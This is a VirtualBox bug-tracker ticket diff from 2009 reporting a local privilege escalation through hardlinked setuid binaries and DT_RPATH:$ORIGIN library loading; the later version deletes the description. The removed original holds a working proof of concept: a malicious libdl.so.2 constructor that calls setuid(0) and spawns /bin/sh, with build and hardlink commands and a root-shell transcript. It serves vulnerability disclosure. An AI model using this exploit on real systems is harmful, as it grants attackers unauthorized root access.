VirtualBox

Changes between Initial Version and Version 2 of Ticket #3444


Ignore:
Timestamp:
02/26/09 08:55:13 (5 years ago)
Author:
frank
Comment:

Thanks for this report, we will fix this ASAP.

Legend:

Unmodified
Added
Removed
Modified
  • Ticket #3444

    • Property Summary changed from privilege escalation due to DT_RPATH:$ORIGIN and set*id to Privilege Escalation
  • Ticket #3444 – Description

    initial v2  
    1 hardlinks on Linux preserve permission, including set*id bits, and can be created by non-root users.  virtualbox attempts to perform some sanity checks on the dir the binary exists in (presumably to prevent privilege escalation), however that is done after the constructors in shared libs are run.  that means any library a virtualbox binary links against is an attack vector. 
    2  
    3 the constructor isnt the only attack vector ... you could also override any of the standard C library functions that virtualbox would call during its startup.  like open() or stat() or ... 
    4  
    5 there really isnt many workarounds available here if DT_RPATH:$ORIGIN is continued to be used.  perhaps making a small dedicated partition (loopback or whatever) and storing the binaries on there because hardlinks cannot go across partitions. 
    6  
    7 simple example: 
    8 {{{ 
    9 $ id -u 
    10 1002 
    11  
    12 $ cat test.c 
    13 #include <unistd.h> 
    14 #include <sys/syscall.h> 
    15 __attribute__((constructor)) 
    16 void awesome(void) 
    17 { 
    18         char *argv[] = { "sh", NULL }; 
    19         extern char *environ; 
    20         syscall(SYS_setuid, 0); 
    21         syscall(SYS_execve, "/bin/sh", argv, environ); 
    22 } 
    23  
    24 $ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2 
    25  
    26 $ ls -l /opt/VirtualBox/VirtualBox 
    27 -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox 
    28  
    29 $ ln /opt/VirtualBox/VirtualBox 
    30  
    31 $ ls -l VirtualBox 
    32 -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox 
    33  
    34 $ ./VirtualBox 
    35 ./VirtualBox: /home/vapier/libdl.so.2: no version information available (required by ./VirtualBox) 
    36 sh-4.0# whoami 
    37 root 
    38 }}} 
     1''description of this report deleted'' 

www.oracle.com
ContactPrivacy policyTerms of Use